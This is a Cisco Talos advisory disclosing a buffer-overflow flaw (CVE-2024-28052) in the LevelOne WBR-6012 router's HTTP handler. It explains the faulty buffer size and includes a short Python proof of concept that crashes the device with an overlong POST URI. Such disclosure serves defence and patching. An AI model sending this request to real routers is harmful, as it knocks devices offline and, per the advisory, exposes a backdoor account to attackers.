Talos Vulnerability Report

TALOS-2024-1997

LevelOne WBR-6012 Web Application buffer overflow vulnerability

October 30, 2024
CVE Number

CVE-2024-28052

SUMMARY

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

LevelOne WBR-6012 R0.40e6

PRODUCT URLS

WBR-6012 - https://us.level1.com/products/wbr-6012

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CWE

CWE-131 - Incorrect Calculation of Buffer Size

DETAILS

The WBR-6012 is a wireless SOHO router. It is a low-cost device which functions as an internet gateway for homes and small offices while aiming to be easy to configure and operate. In addition to providing a WiFi access point, the device serves as a 4-port wired router and implements a variety of common SOHO router capabilities such as port forwarding, quality-of-service, web-based administration, a DHCP server, a basic DMZ, and UPnP capabilities.

An HTTP POST request with a URI containing 1454 characters or more that does not start with “upn” or “upg” will crash and reboot the device, allowing for an attacker to access the backdoor account (TALOS-2024-1979).

The function located at 0x800bfcfc parses and handles HTTP data. Logic is present in this function for several HTTP methods: GET, POST, SUBS and UNSU. If a POST request is made, the device looks for the strings “/upg” and “/upn” but the function does not contain logic to explicitly handle POST requests that do not start with those strings.

Early in this function there is a call (at 0x800bffcc) to a function (at 0x80004518) which receives network data, allocates memory for a buffer, and utilizes memcpy to move the HTTP request data in to the new buffer. At the time this function is called, the size specified for buffer allocation is 0x5BC bytes. The function prototype is:

size_t recv_data(dword data, char *buffer, dword size)

Sending an HTTP POST request that is equal to or greater in length than this buffer, and is not also handled by the “/upg” or “/upn” conditions, will cause the device to crash and reboot. A request of “POST “ + 1454 characters + “ HTTP/1.1” is 1468 (0x5BC) bytes, the size of the buffer.

Exploit Proof of Concept

import requests

response = requests.post('http://192.168.1.1/' + 'A' * 1454)

print(response)

This will send the below HTTP POST request:

POST /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA--<SNIP>-- HTTP/1.1
Host: 192.168.1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 0

The 1454 A’s + “POST “ + “ HTTP/1.1” is 1468 (0x5BC) bytes, the size of the buffer created to work with HTTP requests.

TIMELINE

2024-06-03 - Vendor Disclosure
2024-08-05 - Status update request from TALOS - No reply
2024-09-03 - Status update request - Impending public release notification
2024-10-23 - Vendor notification of upcoming release date
2024-10-30 - Public Release

Credit

Discovered by Patrick DeSantis and Francesco Benvenuto of Cisco Talos.